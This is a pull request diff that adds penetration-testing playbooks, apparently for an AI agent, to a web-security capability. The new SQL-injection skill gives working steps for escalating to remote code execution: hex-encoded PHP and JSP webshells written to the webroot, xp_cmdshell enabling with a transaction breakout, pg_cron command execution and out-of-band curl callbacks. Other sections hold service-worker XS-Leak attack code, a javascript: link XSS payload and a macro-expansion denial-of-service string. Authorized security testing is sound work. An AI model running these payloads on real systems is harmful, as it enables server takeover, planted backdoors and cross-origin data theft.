### PR TITLE
feat(web-security): expand SQLi-to-RCE, math-rendering, and XS-Leak coverage

### DIFF
--- a/capabilities/web-security/capability.yaml
+++ b/capabilities/web-security/capability.yaml
@@ -1,8 +1,8 @@
 schema: 1
 name: web-security
-version: "1.8.0"
+version: "1.9.0"
 description: >
-  Web application penetration testing with 70+ attack technique playbooks
+    Web application penetration testing with 80+ attack technique playbooks
   covering request smuggling, cache poisoning, SSRF, SSTI, DOM
   vulnerabilities, authentication bypasses, parser differentials,
   AEM/Sling exploitation, GraphQL, OAuth, and client-side attacks.

--- a/capabilities/web-security/capability.yaml
+++ b/capabilities/web-security/capability.yaml
@@ -2,7 +2,7 @@ schema: 1
 name: web-security
 version: "1.9.0"
 description: >
-    Web application penetration testing with 80+ attack technique playbooks
+  Web application penetration testing with 80+ attack technique playbooks
   covering request smuggling, cache poisoning, SSRF, SSTI, DOM
   vulnerabilities, authentication bypasses, parser differentials,
   AEM/Sling exploitation, GraphQL, OAuth, and client-side attacks.

--- a/capabilities/web-security/skills/browser-side-channel/SKILL.md
+++ b/capabilities/web-security/skills/browser-side-channel/SKILL.md
@@ -1,6 +1,6 @@
 ---
 name: browser-side-channel
-description: Browser-based side channel attacks for cross-origin data leaks via connection pool exhaustion, ETag oracles, and timing differentials. Use when direct XSS fails but cross-origin information leakage is needed.
+description: Browser-based side channel attacks for cross-origin data leaks via connection pool exhaustion, ETag oracles, timing differentials, and ORB status-code XS-Leaks revived through service-worker destination rewriting. Use when direct XSS fails but cross-origin information leakage is needed.
 ---
 
 # Browser Side Channel Attacks
@@ -85,6 +85,52 @@ detectLoginState('https://target.com/dashboard-asset').then(r =>
 Cached resource loads in ~1-2ms vs network fetch at 50ms+. Reveals browsing history for same-site resources.
 
 **Checkpoint:** Clear cache and re-measure to confirm delta is reproducible. Modern browsers partition cache by top-level site -- this only works for same-site resources.
+
+### ORB Status-Code XS-Leak via Service-Worker Destination Rewrite
+
+Classic status-code XS-Leak: load a cross-origin URL as a `<script>` and read `onload` (2XX) vs `onerror` (4XX). Opaque Response Blocking (ORB) breaks this in modern Chrome/Firefox -- any cross-origin response that does not parse as JavaScript is turned into a **network error**, so `onerror` fires regardless of status code and the oracle collapses.
+
+The revival: ORB decides how to surface a blocked response based on the request's `Sec-Fetch-Dest`. A service worker you control on **your own origin** proxies the outgoing request (`fetch(event.request)`), which silently rewrites the destination to `empty`. With destination `empty`, ORB returns a **blank 200** instead of a network error -- and a blank body still lets the `<script>` element evaluate the HTTP status: 2XX -> `load` (executes 0 bytes), 4XX -> `error`. The status-code oracle works again.
+
+Chromium's ORB logic (`orb_impl.cc`):
+```cpp
+if (request_destination_from_renderer_ != mojom::RequestDestination::kEmpty) {
+  return BlockedResponseHandling::kNetworkError;   // destination=script  -> error always
+}
+return BlockedResponseHandling::kEmptyResponse;    // destination=empty   -> blank 200, status leaks
+```
+
+Attacker-hosted `sw.js`:
+```javascript
+self.addEventListener("install", () => self.skipWaiting());       // activate immediately
+self.addEventListener("message", (e) => {
+  if (e.data === "CLAIM") e.waitUntil(clients.claim());           // take over open tabs
+});
+self.addEventListener("fetch", (e) => e.respondWith(fetch(e.request))); // rewrites dest -> "empty"
+```
+
+Attacker page `exploit.js`:
+```javascript
+await navigator.serviceWorker.register("/sw.js");
+(await navigator.serviceWorker.ready).active.postMessage("CLAIM");
+if (!navigator.serviceWorker.controller) {
+  await new Promise((r) =>
+    navigator.serviceWorker.addEventListener("controllerchange", r, { once: true }));
+}
+function probeError(url) {
+  return new Promise((resolve) => {
+    const s = document.createElement("script");
+    s.src = url;
+    s.onload = () => resolve(true);    // 2XX
+    s.onerror = () => resolve(false);  // 4XX
+    document.head.appendChild(s);
+  });
+}
+console.log(await probeError("https://target.com/admin"));      // true  = 200 (authorized)
+console.log(await probeError("https://target.com/admin/404"));  // false = 4XX
+```
+
+**Checkpoint:** The service worker must control the tab before probing -- a freshly registered SW does not claim open clients until `clients.claim()` runs (why the bug appears "random" across reloads). Wait for `controllerchange` / `navigator.serviceWorker.controller` before the first probe. Confirm the delta against one known-2XX and one known-4XX cross-origin URL; if both return the same event, the SW is not yet controlling the request (check the Network tab shows the request served by "service worker" and `Sec-Fetch-Dest: empty`).
 
 ## Workflow
 

--- a/capabilities/web-security/skills/math-rendering-macro-injection/SKILL.md
+++ b/capabilities/web-security/skills/math-rendering-macro-injection/SKILL.md
@@ -1,0 +1,98 @@
+---
+name: math-rendering-macro-injection
+description: Abuse user-controlled TeX/LaTeX macros in MathJax and KaTeX renderers to override built-in operators, spoof rendered content, inject links/scripts, or exhaust the renderer. Use when an app renders user-supplied math (GitHub-style Markdown math, wikis, comments, chat, LMS, note apps) via MathJax or KaTeX.
+---
+
+# Math Rendering Macro Injection
+
+Apps that render user-supplied mathematics (`$...$`, `$$...$$`, ```` ```math ````) hand attacker text to a TeX processor — usually **MathJax** or **KaTeX**. TeX is a full macro language. If the app enables macro-definition packages on untrusted input, an attacker can redefine what the renderer draws, spoof content in another user's document, inject links, or wedge the renderer.
+
+This is primarily a **content-integrity / UI-redress** class (and sometimes XSS or DoS), not classic reflected XSS. It matters most where rendered math appears in shared, trusted surfaces: repo READMEs, issues/comments, wiki pages, knowledge bases, and chat.
+
+## When To Use
+
+- The target renders math notation (you see `\(`, `\[`, `$$`, KaTeX/MathJax script tags, `.MathJax`/`.katex` DOM classes).
+- The math is derived from untrusted input (comments, issues, profile fields, wiki, chat messages).
+- You want to demonstrate impact beyond "it renders" — override, spoof, link injection, or DoS.
+
+## Fingerprint the Renderer
+
+| Signal | Renderer |
+|---|---|
+| `mathjax`/`tex-*.js`, `window.MathJax`, `.MathJax` / `mjx-container` DOM | MathJax (v2 or v3) |
+| `katex.min.js`, `.katex` / `.katex-html` DOM, `\href` support | KaTeX |
+| `<annotation encoding="application/x-tex">` in output | either (MathML/TeX round-trip) |
+
+Also determine **where** the rendered node lives: same document as trusted content (e.g. a comment rendered inside a repo page) is what makes override interesting.
+
+## Core Technique: Macro Redefinition / Operator Shadowing (MathJax)
+
+MathJax's `newcommand` package stores every `\def`, `\newcommand`, `\let` in a dedicated `CommandMap` (`new-Command`) registered **ahead of** the base operator maps at `priority: -1`. The write path (`addMacro`) adds to that map with **no check against the base maps**, and lookup is first-match-wins. So a user definition of a built-in control sequence (`\sum`, `\sqrt`, `\int`, …) *occludes* the native one rather than being rejected.
+
+Effect: you can make a native operator render as arbitrary text/markup, overwriting how content appears in a victim's document.
+
+```tex
+$\def\sum{\bf ATTACKER-CONTROLLED}$
+$$\sum_{i=0}^n i$$      %% renders "ATTACKER-CONTROLLED" where the Σ operator should be
+```
+
+Variants to test, in rough order of impact:
+
+| Macro | Impact |
+|---|---|
+| `\def`, `\newcommand`, `\let` | highest — redefine/override operators and content |
+| `\renewcommand` | override an existing command |
+| `\newenvironment` | redefine environment rendering |
+| `\definecolor` + `\color` | recolor / hide text (low, but useful for spoofing) |
+
+Detect enablement quickly: if `$\def\x{A}\x$` renders `A`, the `newcommand` package is active on untrusted input.
+
+## KaTeX Equivalents
+
+- KaTeX supports `\def`, `\gdef`, `\newcommand`, `\renewcommand` unless the host passes a restricted config. Same operator-shadowing idea applies.
+- **`\href` link injection**: `\href{URL}{text}` renders a clickable link inside the math node. Test whether the host restricts the scheme — older/misconfigured setups allow `javascript:`/`data:`; the KaTeX default `trust: false` blocks `\href` entirely, and `trust: true` (or a permissive callback) is the vulnerable state.
+  ```tex
+  \href{javascript:alert(document.domain)}{click}
+  ```
+- **`\includegraphics`** / `\htmlData` / `\htmlClass` / `\htmlId` are gated by `trust`/`strict`; when enabled they become HTML-attribute injection primitives worth testing for XSS or DOM clobbering.
+
+## Denial-of-Service Variants
+
+- **Macro expansion blowup**: nested self-referential macros can explode expansion. MathJax caps this with `maxMacros`/`maxBuffer`; KaTeX with `maxExpand`. If the host raised or disabled the cap, a small payload can hang the renderer tab.
+  ```tex
+  \def\a{\b\b}\def\b{\a\a}\a
+  ```
+- **Deep/huge structures**: large `\underbrace`/matrix nesting or enormous `\rule` dimensions can freeze layout. Treat as client-side DoS affecting every viewer of the shared content.
+
+## Impact Framing
+
+- **Content spoofing / integrity**: the rendered math in a *victim's* README/issue/wiki shows attacker-chosen content — misinformation, fake values, defacement of trusted pages. This is the GitHub-class bug (paid across multiple variants).
+- **Link/redirect injection** via `\href` — phishing from a trusted origin, or XSS if `javascript:`/HTML sinks are reachable.
+- **DoS** — renderer hang for all viewers.
+Record which surface the node renders in and who else sees it — impact scales with the trust and audience of that surface.
+
+## Verification
+
+1. Confirm the package is enabled: `$\def\x{PWN}\x$` → renders `PWN`.
+2. Override a real operator and screenshot the rendered result in a shared/trusted context (issue, wiki, comment), not just your own scratch page.
+3. For `\href`, confirm the emitted `<a>` `href` and whether the scheme survived sanitization (inspect the DOM, not the source).
+4. For DoS, measure render time / tab responsiveness with a bounded payload before escalating.
+
+## Remediation (for the report)
+
+Disable macro-definition packages on untrusted input:
+```javascript
+// MathJax v3 — remove the newcommand package for user content
+window.MathJax = { tex: { packages: { '[-]': ['newcommand', 'action', 'html'] } } };
+```
+```javascript
+// KaTeX — reject definitions and dangerous commands on untrusted input
+katex.render(src, el, { trust: false, strict: "error", maxExpand: 1000 });
+```
+Render untrusted math in an isolated origin/sandboxed iframe so an override cannot alter trusted document content.
+
+## Chain With
+
+- **dom-vulnerability-detection** — when `\href`/`\html*` reaches a script or attribute sink, confirm the XSS there.
+- **data-exfil** — Markdown/rendered-output injection channels for exfil when a link/image sink is reachable.
+- **report-preflight** — frame content-spoofing severity and eligibility before submitting.

--- a/capabilities/web-security/skills/sqli-to-rce-escalation/SKILL.md
+++ b/capabilities/web-security/skills/sqli-to-rce-escalation/SKILL.md
@@ -1,0 +1,166 @@
+---
+name: sqli-to-rce-escalation
+description: Escalate a confirmed SQL injection point into server-side command execution or a webshell. Use when you already have injection (stacked queries, ORDER BY, second-order, or error/UNION) and the DB account holds privileges that reach the OS — MSSQL xp_cmdshell, PostgreSQL COPY TO PROGRAM / pg_cron, MySQL INTO OUTFILE, or Java-embedded DB export procedures. Covers privilege checks, transaction-context breakout, and non-stacked reach.
+---
+
+# SQLi to RCE Escalation
+
+You have a confirmed SQL injection point. Data extraction is not the goal — code execution is. This skill turns an injection into OS command execution or a planted webshell by abusing DBMS features that reach the filesystem or a shell.
+
+Do this only against targets you are explicitly authorized to test. RCE payloads are destructive to shared state; keep markers unique and clean up.
+
+## When To Use
+
+- Injection is confirmed (stacked, `ORDER BY`, second-order, UNION, or error-based) and you want maximum impact.
+- The DB account may be high-privilege (`sysadmin`, `SUPERUSER`, `DBA`, DB owner).
+- You need to prove impact beyond read access for a report.
+
+If you only need to read data through a blind oracle, use **blind-sqli-extraction** instead. Come back here once you know the DBMS and privilege level.
+
+## Escalation Decision Flow
+
+1. **Fingerprint the DBMS** — `@@version` (MSSQL/MySQL), `version()` (PostgreSQL), `banner FROM v$version` (Oracle), connection URL/driver (embedded Java: Derby, H2, HSQLDB, ObjectDB).
+2. **Confirm privilege** — the escalation path is gated on the DB role, not the injection itself. Check before spending requests on a payload that cannot fire.
+3. **Confirm injection shape** — stacked queries available? If not, use the non-stacked reach techniques below.
+4. **Pick the OS-reach primitive** for that DBMS (table below).
+5. **Handle the execution context** — user transaction, comment terminator, encoding, second-order trigger.
+6. **Fire, verify with a unique marker, clean up.**
+
+## Privilege Preflight (do this first)
+
+| DBMS | Privilege check | Needed for |
+|---|---|---|
+| MSSQL | `SELECT IS_SRVROLEMEMBER('sysadmin')` → 1 | `xp_cmdshell`, `sp_configure` |
+| MSSQL | `SELECT value_in_use FROM sys.configurations WHERE name='xp_cmdshell'` | is it already on? |
+| PostgreSQL | `SELECT rolsuper FROM pg_roles WHERE rolname=current_user` → t | full path: `COPY TO PROGRAM`, `pg_cron`, untrusted PL |
+| PostgreSQL | `SELECT pg_has_role(current_user,'pg_execute_server_program','MEMBER')` → t | `COPY TO PROGRAM` **without** SUPERUSER (PG 11+) |
+| PostgreSQL | `SELECT extname FROM pg_extension` | is `pg_cron` / `plperlu` present? (see pg_cron database caveat below) |
+| MySQL | `SELECT file_priv FROM mysql.user WHERE CURRENT_USER() LIKE CONCAT(user,'@%')` | `FILE` priv gates `INTO OUTFILE`/`DUMPFILE`; UDF also needs writable `@@plugin_dir` |
+| MySQL | `SELECT @@secure_file_priv` | **empty `''` = write anywhere; a path = that dir only; `NULL` = file export disabled entirely (escalation dead)** |
+| Oracle | `SELECT * FROM session_roles` (DBA?) | `DBMS_SCHEDULER`, Java stored proc |
+| Embedded Java (Derby/H2/ObjectDB) | connection is DB owner / default creds | export procedure or ALIAS-to-Java |
+
+If the account is least-privilege, escalation stops here — report the injection at its data-access severity and note the missing privilege as the only barrier.
+
+**Checkpoint:** Do not build an OS-reach payload until the privilege preflight confirms both a qualifying role AND that the primitive is enabled or enable-able. Skipping this wastes requests on a path that cannot fire and increases noise.
+
+## OS-Reach Primitives by DBMS
+
+| DBMS | Primitive | Result |
+|---|---|---|
+| **MSSQL** | `EXEC xp_cmdshell '<cmd>'` (enable via `sp_configure` if off) | OS command as SQL service account |
+| **MSSQL** | `EXEC sp_configure 'Ole Automation Procedures',1` + `sp_OACreate` | command exec without xp_cmdshell |
+| **PostgreSQL** | `COPY (SELECT '') TO PROGRAM '<cmd>'` | OS command as postgres user |
+| **PostgreSQL** | `cron.schedule_in_database(...)` → scheduled `COPY TO PROGRAM` | deferred exec; **works without stacked queries** (see below) |
+| **PostgreSQL** | `CREATE FUNCTION ... LANGUAGE plperlu/plpythonu` | in-process command exec |
+| **MySQL/MariaDB** | `SELECT '<webshell>' INTO OUTFILE '/var/www/.../s.php'` | plant a webshell in webroot |
+| **MySQL/MariaDB** | UDF `sys_exec`/`sys_eval` via `INTO DUMPFILE` of a `.so`/`.dll` | direct command exec |
+| **Oracle** | `DBMS_SCHEDULER.CREATE_JOB` (executable) / `DBMS_JAVA`/`loadjava` | OS command (see external-job caveat) |
+| **Derby (embedded)** | `CALL SYSCS_UTIL.SYSCS_EXPORT_QUERY(...)` → write JSP/JSP-webshell into servlet docBase | webshell RCE |
+| **H2 (embedded)** | `CREATE ALIAS ... AS $$ ... Runtime.exec ... $$` | in-process Java exec |
+
+### MySQL webshell one-liner
+
+```sql
+' UNION SELECT 0x3c3f706870...  -- <?php system($_GET[c]); ?> hex
+INTO OUTFILE '/var/www/html/uploads/x.php'-- -
+```
+Requires the `FILE` privilege and a web-served, writable directory allowed by `secure_file_priv` (if `secure_file_priv` is `NULL`, file export is disabled and this path is dead). Use `INTO DUMPFILE` (not `OUTFILE`) for exact bytes when planting a `.so`/`.dll` UDF library into `@@plugin_dir`, then `CREATE FUNCTION sys_exec RETURNS INT SONAME '...'`.
+
+### Derby export-to-webshell (embedded Java DBs)
+
+`SYSCS_UTIL.SYSCS_EXPORT_QUERY` writes a query result to any path. Point it at a Tomcat/Jasper docBase so the written `.jsp` compiles on first GET:
+
+```sql
+CALL SYSCS_UTIL.SYSCS_EXPORT_QUERY(
+  'SELECT ''<%Runtime.getRuntime().exec(request.getParameter("c"));%>'' FROM SYSIBM.SYSDUMMY1',
+  'webfront/webapps/ROOT/x.jsp', ',', '"', 'UTF-8')
+```
+Relative paths resolve from the DB process CWD (often the install root). Then `GET /x.jsp?c=id`.
+
+`SYSCS_EXPORT_QUERY` applies CSV quoting: each exported field is wrapped in the character delimiter (`"` above) and CSV-escaped. The planted file becomes `"<%...%>"` — the surrounding quotes are template text outside the scriptlet, so it still compiles, but pick a character delimiter that does not appear in your payload to avoid escaping artifacts. Do not chase a "corrupted webshell" — check the on-disk bytes.
+
+## Execution Context Handling
+
+The payload rarely lands in a clean statement. Three context problems dominate:
+
+### 1. Non-stacked injection (no `;` allowed)
+
+Many sinks are `ORDER BY`, `WHERE`, or a filter that forbids semicolons (or a filter blocks unescaped `;`). You cannot append a second statement — but you can call a side-effect function inline.
+
+- **`ORDER BY` position** accepts an arbitrary scalar expression:
+  ```sql
+  ORDER BY (SELECT cron.schedule_in_database('j','* * * * *',
+    'COPY (SELECT 1) TO PROGRAM ''id > /tmp/mk''','db','user',true))
+  ```
+  This is a single statement, no semicolon — it bypasses semicolon-blocking filters. The scheduled job then runs `COPY TO PROGRAM` on the next pg_cron tick. Same idea with `lo_export`, or a subselect calling a privileged function.
+  - **pg_cron gotcha**: pg_cron runs against its configured `cron.database_name` (often `postgres`) and the `cron` extension must exist there. `schedule_in_database` lets you target another DB, but the scheduler background worker must be loaded (`shared_preload_libraries = 'pg_cron'`). If pg_cron is present but idle, prefer a direct `COPY TO PROGRAM` when stacked queries are available.
+- **MSSQL non-stacked**: side effects from a pure subquery are limited (functions cannot run `EXEC`) — prefer finding a stacked sink. Where the injection reaches a procedure/dynamic-SQL context, that context may allow the stacked escalation even if the outer statement does not.
+- **Oracle external jobs**: `DBMS_SCHEDULER.CREATE_JOB` with `job_type => 'EXECUTABLE'` needs the external job runner configured (OS credential / `externaljob.ora`), which is often absent on default installs. The `DBMS_JAVA.runjava` / `loadjava` path is the more reliable in-process primitive when the account has Java permissions.
+- Confirm the tick/delay and poll your marker; deferred schedulers (pg_cron minimum 1 minute) need a wait.
+
+### 2. Injection inside a user transaction (MSSQL Msg 574)
+
+If the sink executes inside `BEGIN TRANSACTION` (common in queue/processor code), `sp_configure` + `RECONFIGURE` fails:
+
+> Msg 574: CONFIG statement cannot be used inside a user transaction.
+
+**Breakout**: issue `COMMIT;` first in your stacked batch to end the caller's transaction, then run `RECONFIGURE` outside it:
+
+```sql
+x','<ts>','<ts>'); COMMIT; EXEC sp_configure 'show advanced options',1; RECONFIGURE;
+EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE;
+EXEC xp_cmdshell 'whoami > C:\Windows\Temp\mk.txt'; --
+```
+
+### 3. Second-order injection (write is safe, read is not)
+
+The insert is parameterized (safe), but a later code path concatenates the stored value into a new query. Store the payload through the safe write, then trigger the vulnerable read.
+
+- Identify a stored field that reaches a raw-concatenation read (e.g. a name reused in `... LIKE '<stored>'`).
+- Watch for trigger conditions in the read path (e.g. the value must contain `%` to enter a `NOT LIKE` branch).
+- Terminate correctly: your payload must close the original string/paren and comment out the trailing SQL (`-- ` with a trailing space, or `#`).
+- Leftover rows from prior attempts can consume your comment terminator — clean state or ensure your row executes first.
+
+## Terminator and Encoding Cheatsheet
+
+- Close a string literal, then the statement: `'`, then `); ... --` (leave a trailing space after `--`).
+- MySQL comment: `-- ` (space required) or `#` or `/* */`.
+- **URL encoding trap**: encode spaces as `%20`, not `+`. Some servers decode `+` literally, corrupting `+COMMIT` etc. Use `urllib.parse.quote(payload, safe='')`, not `quote_plus`/`urlencode`.
+- Quote-blocking filters: hex-encode string constants (`0x...` in MSSQL/MySQL, `decode('..','hex')` / `chr()` concat in PostgreSQL) or use `CHAR()`/`CONCAT`.
+
+## Verification
+
+- Write a **unique marker** to a known path (`/tmp/<rand>.txt`, `C:\Windows\Temp\<rand>.txt`) and read it back, or capture command output into a table you then SELECT.
+- Prefer an out-of-band callback (see **blind-ssrf-chains** / OOB callback tools) when you cannot read the filesystem — `xp_cmdshell 'nslookup <id>.oob'`, `COPY ... TO PROGRAM 'curl <oob>'`.
+- Record the executing identity (`whoami` / `id`) — it sets the true impact (SYSTEM/root vs a low-priv service account).
+
+**Checkpoint:** Treat RCE as confirmed only when a unique marker or captured command output ties back to your specific payload. A 200 response or silent success is not proof — deferred schedulers and second-order reads fire out of band.
+
+## Cleanup
+
+- Drop planted webshells, scheduled jobs (`cron.unschedule`, `DBMS_SCHEDULER.DROP_JOB`), and marker files.
+- Reset config you changed only if the target expects it off (`sp_configure 'xp_cmdshell',0; RECONFIGURE`) — note in the report that you toggled it.
+- Delete second-order payload rows you inserted.
+
+## Indicators
+
+- **Escalation viable**: privilege preflight returns high-priv role AND an OS-reach primitive is enabled/reachable.
+- **Confirmed RCE**: unique marker appears / command output captured, with the executing identity recorded.
+- **Context handled**: transaction breakout or non-stacked reach produced the marker where a naive stacked payload failed.
+
+## References
+
+- MSSQL Msg 574 (CONFIG statement inside a user transaction) and the `COMMIT;` breakout — Microsoft T-SQL `RECONFIGURE` / `sp_configure` documentation.
+- PostgreSQL `COPY ... TO PROGRAM` and the `pg_execute_server_program` predefined role — PostgreSQL `COPY` reference and predefined-roles documentation.
+- pg_cron `cron.schedule_in_database` as a non-stacked side-effect primitive — pg_cron project README (`shared_preload_libraries`, `cron.database_name`).
+- Apache Derby `SYSCS_UTIL.SYSCS_EXPORT_QUERY` file-write procedure — Derby system procedures reference.
+- MySQL `secure_file_priv` semantics (`''` vs path vs `NULL`) — MySQL server system-variable reference.
+
+## Chain With
+
+- **blind-sqli-extraction** — fingerprint DBMS, extract version/user/privilege before escalating here.
+- **timing-attack-recon** / **parser-differential-bypass** — reach the injection point and slip payloads past a WAF.
+- **blind-ssrf-chains** — OOB verification when the filesystem is not readable.
+- **write-path-to-rce** — once a DB write primitive lands a file, escalate the file-write into execution (framework template/view planting).
+- **report-preflight** — severity and eligibility framing before submitting.


### PR DESCRIPTION
## Summary

Evaluated recent public web-security research and integrated the reusable techniques that filled genuine gaps in the capability playbook set. Markdown-only changes (new/updated SKILL.md files) plus a version bump — no tooling, MCP, or runtime changes.

Three additions, each vetted against the existing 79 skills to avoid duplication:

### 1. `sqli-to-rce-escalation` (new skill)
Escalates a **confirmed** SQL injection into OS command execution or a planted webshell. `blind-sqli-extraction` already covers reading data through an oracle, but nothing covered the escalation-to-RCE path. DBMS-complete:

- **Privilege preflight** per engine (MSSQL `sysadmin`, PostgreSQL `rolsuper` / `pg_execute_server_program`, MySQL `FILE` + `secure_file_priv` semantics, Oracle DBA, embedded-Java owners) — the escalation is gated on the DB role, not the injection.
- **OS-reach primitives**: `xp_cmdshell`, OLE Automation, `COPY TO PROGRAM`, pg_cron non-stacked `ORDER BY` reach, `INTO OUTFILE`/`DUMPFILE` UDF, Derby `SYSCS_EXPORT_QUERY` → JSP webshell, H2 `CREATE ALIAS`.
- **Execution-context handling**: MSSQL Msg 574 user-transaction `COMMIT` breakout, second-order write/read split, terminator + URL-encoding traps.

### 2. `math-rendering-macro-injection` (new skill)
Abuse user-controlled TeX macros in MathJax/KaTeX renderers (GitHub-class content-integrity bug). Covers `newcommand`-package operator shadowing (priority `-1` CommandMap, no base lookup), KaTeX `\def`/`\href` `trust` and `\html*` sinks, macro-expansion DoS (`maxMacros`/`maxExpand`), impact framing, and remediation configs. No prior skill touched math-rendering surfaces.

### 3. `browser-side-channel` (extended)
Added the ORB status-code XS-Leak revived via a service-worker `fetch` proxy that rewrites `Sec-Fetch-Dest` to `empty`, turning ORB network errors into blank 200s so the `<script>` `onload`/`onerror` status-code oracle works again in modern Chrome/Firefox. Complements the existing connection-pool / ETag / timing techniques.

**Evaluated but intentionally not added:**
- postMessage `targetOrigin` IP-normalization bypass — **already covered** in `dom-vulnerability-detection`.
- npx-confusion / bin-mismatch supply-chain RCE — out of scope for web-app pentest; belongs in the `sast` / supply-chain capability, not web-security.

## Validation
- `dreadnode capability validate capabilities/web-security` → passes (81 skills; the two `caido-cli`/`burp` warns are pre-existing external-CLI checks, confirmed identical on clean `main`).
- Core technical claims spot-checked against authoritative docs (KaTeX `trust:false` forbids `\href`; MathJax `packages: {'[-]': [...]}` removal syntax).
- Peer-review pass on the SQLi skill produced fixes (corrected `secure_file_priv NULL` = export-disabled, added `pg_execute_server_program`, Oracle external-job and Derby CSV-quoting caveats, References + Checkpoints).

Bumps `web-security` `1.8.0` → `1.9.0`.
